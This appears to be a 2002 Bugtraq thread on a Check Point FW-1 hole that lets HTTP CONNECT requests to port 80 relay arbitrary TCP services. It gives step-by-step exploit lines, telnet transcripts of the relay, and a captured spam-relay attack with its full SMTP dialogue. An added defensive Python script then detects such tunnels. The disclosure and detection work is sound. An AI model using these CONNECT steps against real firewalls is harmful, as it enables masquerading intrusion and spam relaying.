William, I was only partially able to reproduce your issue and it was only to destinations and services that my firewall would have already allowed anyway.

root@mojo:~# telnet www.xxx.com 80
Trying 19x.1x8.xx6.1x3...
Connected to www.xxx.com.
Escape character is '^]'.
CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0

HTTP/1.0 200
220 ESMTP
helo firewall
250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you
quit
221 2.0.0 mail.xxx.com closing connection
Connection closed by foreign host.

Any other connection attempt to an IP:port that was not normally allowed by policy was denied.

root@mojo:~# telnet www.xxx.com 80
Trying 19x.1x8.xx6.1x3...
Connected to www.xxx.com.
Escape character is '^]'.
CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0

HTTP/1.0 200
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 85

<TITLE>Error</TITLE>
<BODY>
<H1>Error</H1>
FW-1 at xxxexmfwx: Access denied.</BODY>
Connection closed by foreign host.

While it is a little startling that Checkpoint would allow this kind of connection, I was not able to actually connect to any place that I would not normally be able to connect from the internet. I do not allow http tunneling. We are running the http security server strictly to block the nimda and code red attacks.

I am running 4.1 Sp5

Regards
Dennis

----- Original Message -----
From: "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu>
To: <bugtraq@securityfocus.com>; "Dan Lunceford" <dan@nmt.edu>; "Ryan" <ryan@nmt.edu>; <support@aquilagroup.com>
Cc: "Madeline Navarrette" <mnavarre@ts.checkpoint.com>
Sent: Monday, February 18, 2002 6:09 PM
Subject: UPDATE: [wcolburn@nmt.edu: SMTP relay through checkpoint firewall]

> Checkpoint bounced my mail because I'm not a checkpoint customer, so I
> contacted customer advocacy and resent it to a different address (this
> message is copied to her as well). I was told that the issue would be
> propagated to an appropriate person.
>
> Please drop the old message and continue to hold this message until
> Checkpoint responds.
>
> I have a few updates to this issue that I have learned since I crafted
> the original message.
>
> I only need to give the "CONNECT" line, and nothing else. After the
> second newline there is a pause and then the TCP stream is open. I seem
> to be able to open any port on any machine I want *except* port 80. I
> was able to telnet in to UNIX login with the firewall appearing as the
> remote host. The initial machine I use (inside the firewall) does not
> need to actually exist, I merely have to attempt to connect to an IP
> address "inside" on port 80.
>
> This hole gives anyone outside a firewall the ability to masquerade on
> any TCP service (except WWW) as a machine inside the domain of the
> firewall. As far as I can tell there are no logs on this, and it is
> hard to detect on the firewall. I found it by doing a tcpdump of all
> packets and gradually narrowing down my filters until I was able to
> "catch" an entire transaction.
>
> ----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu> -----
>
> Step one: telnet to a machine behind the checkpoint firewall on port 80
>
> Step two: Type the following:
> >CONNECT mailserver.somecompany.com:25 / HTTP/1.0
> >User-Agent: eeep
> >Cache-Control: private,no-cache
> >Pragma: no-cache
> >
>
> Step three: wait a moment for your SMTP banner to pop up.
>
> I will attach an actual attack I captured with tcpdump and ethereal.
> The file is the result of an ethereal "Follow TCP stream".
>
> I hate the person who did this to me and I hope they die a terrible
> death.
>
> --
> William Colburn, "Sysprog" <wcolburn@nmt.edu>
> Computer Center, New Mexico Institute of Mining and Technology
> http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
>
> --AqsLC8rIMeq19msA
> Content-Type: text/plain; charset=us-ascii
> Content-Disposition: attachment; filename=checkpoint
>
> From root@netpeep.nmt.edu Mon Feb 18 16:05:43 2002
> Return-Path: <root@netpeep.nmt.edu>
> Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10])
>         by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872
>         for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700
> Received: from netpeep.nmt.edu (localhost [127.0.0.1])
>         by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585
>         for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700
> Received: (from root@localhost)
>         by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584
>         for schlake@nmt.edu; Mon, 18 Feb 2002 16:05:43 -0700
> Date: Mon, 18 Feb 2002 16:05:43 -0700
> From: root <root@netpeep.nmt.edu>
> Message-Id: <200202182305.g1IN5h8w020584@netpeep.nmt.edu>
> To: schlake@nmt.edu
> Content-Length: 3580
> Lines: 112
>
> CONNECT mail2.freeuk.net:25 / HTTP/1.0
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Cache-Control: private,no-cache
> Pragma: no-cache
>
> HELO hotmail.com
> MAIL FROM: <pheros680506@hotmail.com>
> RCPT TO: <renewinter@freeuk.com>
> RCPT TO: <renewu@freeuk.com>
> RCPT TO: <renfah@freeuk.com>
> RCPT TO: <renfi11160@freeuk.com>
> RCPT TO: <renfield13@freeuk.com>
> RCPT TO: <renfield20@freeuk.com>
> RCPT TO: <renfield94@freeuk.com>
> RCPT TO: <renfrew@freeuk.com>
> RCPT TO: <renfro33@freeuk.com>
> RCPT TO: <reng3@freeuk.com>
> RCPT TO: <renga@freeuk.com>
> RCPT TO: <rengel293@freeuk.com>
> RCPT TO: <rengel7495@freeuk.com>
> RCPT TO: <rengelh946@freeuk.com>
> RCPT TO: <rengers@freeuk.com>
> RCPT TO: <rengised@freeuk.com>
> RCPT TO: <rengl21068@freeuk.com>
> RCPT TO: <rengl29048@freeuk.com>
> RCPT TO: <rengl78818@freeuk.com>
> DATA
> Reply-To: <pheros680506@hotmail.com>
> Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff>
> From: <pheros680506@hotmail.com>
> To: <renewinter@freeuk.com>
> Cc: <renewu@freeuk.com>,
> <renfah@freeuk.com>,
> <renfi11160@freeuk.com>,
> <renfield13@freeuk.com>,
> <renfield20@freeuk.com>,
> <renfield94@freeuk.com>,
> <renfrew@freeuk.com>,
> <renfro33@freeuk.com>,
> <reng3@freeuk.com>,
> <renga@freeuk.com>,
> <rengel293@freeuk.com>,
> <rengel7495@freeuk.com>,
> <rengelh946@freeuk.com>,
> <rengers@freeuk.com>,
> <rengised@freeuk.com>,
> <rengl21068@freeuk.com>,
> <rengl29048@freeuk.com>,
> <rengl78818@freeuk.com>
> Subject: A new fragrance (3437AlLf5-384bbsO4815hPeX5-01@27)
> MiME-Version: 1.0
> Content-Type: text/html; charset="iso-8859-1"
> X-Priority: 3 (Normal)
> X-MSMail-Priority: Normal
> X-Mailer:
> Importance: Normal
>
> Hi !
>
> <HTML>
> <head><title>Pheros attraction</title>
> </head>
> <BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF">
> <CENTER>
> <TABLE WIDTH="650">
> <TR>
> <TD COLSPAN="2">
> <FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you this e-mail. I do not intend to
> cause you harm, fill up your mailbox or bother you needlessly. I am only
> trying to reach those who are not as secure in their financial future as I
> was when I first started looking for a way to earn money online. To be
> removed, please go to the end of this e-mail. Please forgive me if you
> receive this advertisement twice.<BR><BR>
> </FONT>
> </TD>
> </TR>
> <TR>
> <TD VALIGN="TOP">
> <FONT FACE="VERDANA, ARIAL">
> Pheros is a lovely fragrance with a touch of human
> pheromones, packaged in a exclusive crafted box.
> Pheros is a foolproof tool of seduction, the scent and the
> pheromones together make a foolproof combination.
> No one can resist the wearer of this mysterious fragrance!
> Pheros combines high tech science with the well-known
> function of the scent of a luxorious perfume. <BR>
> The price is 19.95 USD/Bottle, including P&P! Payment is done via PayPal!
> <BR>To order, klick the Paypal logo <A HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name =Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif" border="0"></A>
> <BR>
>
> </FONT>
> </TD>
> <TD>
> <IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg" border="2">
> </TD>
> </TR>
> <TR>
> <TD COLSPAN="2">
> <BR>
> <FONT FACE="Verdana, Arial">
> To be removed from this mailing list, please reply to this message with the subjct "remove".
> You will be BLOCKED from all mail from this site and your request will take effect within 24 hours.
> </FONT>
> </TD>
> </TR>
> </TABLE>
> </CENTER>
> </BODY>
> </HTML>
> [2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz @71]
>
> .
> QUIT
>
>
> --AqsLC8rIMeq19msA--
>
> ----- End forwarded message -----
>
> --
> William Colburn, "Sysprog" <wcolburn@nmt.edu>
> Computer Center, New Mexico Institute of Mining and Technology
> http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
>
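A defender-side check prompted by the two transcripts in this thread. This is an added example, not code from the thread, from Checkpoint or from NMT: it takes reassembled TCP conversations (the kind an ethereal "Follow TCP stream" dump produces), recognises both CONNECT request-line forms that appear on the page, and classifies each attempt. The important detail it handles is the one Dennis's transcript shows: FW-1 answered `HTTP/1.0 200` for the refused port-22 request as well as for the relayed port-25 one, so the status code alone does not say whether a tunnel was opened; the check looks instead at whether a foreign service banner or the firewall's "Access denied" page followed. Host names, addresses, the port list and the sample conversations are constructed for the example.

```python
"""Flag HTTP CONNECT tunnel attempts in reassembled TCP conversations.

Added example; the sample streams below are constructed and modelled on the
transcripts in the thread, not taken from a real capture.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Ports for which a CONNECT through an HTTP security server is almost never
# legitimate browser traffic (443 is the one port CONNECT normally carries).
# Constructed list; tune it to the site's policy.
SUSPICIOUS_PORTS = {22, 23, 25, 110, 143, 3389}

# Accepts the RFC form "CONNECT host:port HTTP/1.0" and the
# "CONNECT host:port / HTTP/1.0" form seen in the captured attack.
CONNECT_RE = re.compile(
    r"^CONNECT\s+(?P<host>[^\s:/]+):(?P<port>\d{1,5})(?:\s+/)?\s+HTTP/1\.[01]\s*$"
)
STATUS_RE = re.compile(r"^HTTP/1\.[01]\s+(?P<code>\d{3})")
# Evidence that a non-HTTP service answered through the tunnel:
# an SMTP/FTP-style "NNN " reply line or an SSH version banner.
BANNER_RE = re.compile(r"^(?:\d{3}[ -]|SSH-\d)")


@dataclass
class TunnelAttempt:
    host: str
    port: int
    status: Optional[int]  # status code of the firewall's reply, if any
    opened: bool           # a foreign service banner followed the reply


def parse_connect(line: str) -> Optional[Tuple[str, int]]:
    """Return (host, port) if `line` is a CONNECT request line, else None."""
    m = CONNECT_RE.match(line.strip())
    if not m:
        return None
    return m.group("host"), int(m.group("port"))


def analyse_stream(stream: str) -> Optional[TunnelAttempt]:
    """Inspect one conversation (client and server lines interleaved)."""
    lines = [ln.rstrip("\r") for ln in stream.splitlines()]
    for idx, line in enumerate(lines):
        target = parse_connect(line)
        if target:
            break
    else:
        return None  # no CONNECT in this conversation
    host, port = target
    status = None
    denied = False
    opened = False
    for line in lines[idx + 1:]:
        m = STATUS_RE.match(line)
        if m and status is None:
            status = int(m.group("code"))
            continue
        # FW-1 answered 200 even when it refused the tunnel, so decide from
        # what followed the status line, not from the code itself.
        if "access denied" in line.lower():
            denied = True
        elif status is not None and BANNER_RE.match(line):
            opened = True
    return TunnelAttempt(host, port, status, opened and not denied)


def triage(streams: List[str]) -> List[Tuple[str, str, int]]:
    """Classify every conversation; one (verdict, host, port) per CONNECT."""
    findings = []
    for stream in streams:
        att = analyse_stream(stream)
        if att is None:
            continue
        if att.port not in SUSPICIOUS_PORTS:
            verdict = "NON-SUSPICIOUS-PORT"  # e.g. ordinary CONNECT :443
        elif att.opened:
            verdict = "TUNNEL-OPENED"        # firewall relayed a non-web service
        else:
            verdict = "ATTEMPT-DENIED"       # probe worth logging, nothing relayed
        findings.append((verdict, att.host, att.port))
    return findings


# Constructed sample conversations (addresses and host names are made up).
SAMPLE_STREAMS = [
    # 1. CONNECT to an internal mail server: 200, then the SMTP banner follows.
    "CONNECT 10.0.0.25:25 / HTTP/1.0\r\nUser-Agent: eeep\r\n\r\n"
    "HTTP/1.0 200\r\n220 ESMTP\r\nhelo firewall\r\n"
    "250 mail.example.test Hello [10.0.0.1], pleased to meet you\r\n"
    "quit\r\n221 2.0.0 mail.example.test closing connection\r\n",
    # 2. CONNECT to port 22: also a 200 status, but the body is the error page.
    "CONNECT 10.0.0.25:22 / HTTP/1.0\r\n\r\n"
    "HTTP/1.0 200\r\nContent-Type: text/html\r\nContent-Length: 85\r\n\r\n"
    "<TITLE>Error</TITLE>\r\n<BODY>\r\n<H1>Error</H1>\r\n"
    "FW-1 at fw-example: Access denied.</BODY>\r\n",
    # 3. Ordinary web request: not a CONNECT at all.
    "GET / HTTP/1.0\r\nHost: www.example.test\r\n\r\n"
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n",
]

if __name__ == "__main__":
    for verdict, host, port in triage(SAMPLE_STREAMS):
        print(f"{verdict:20} {host}:{port}")
```

Run it over each reassembled conversation from a capture of inbound port-80 traffic to the firewall; the "Access denied" string and the banner patterns are taken from this thread's transcripts and would need adjusting for another product's error page or for services that do not announce themselves with a text banner.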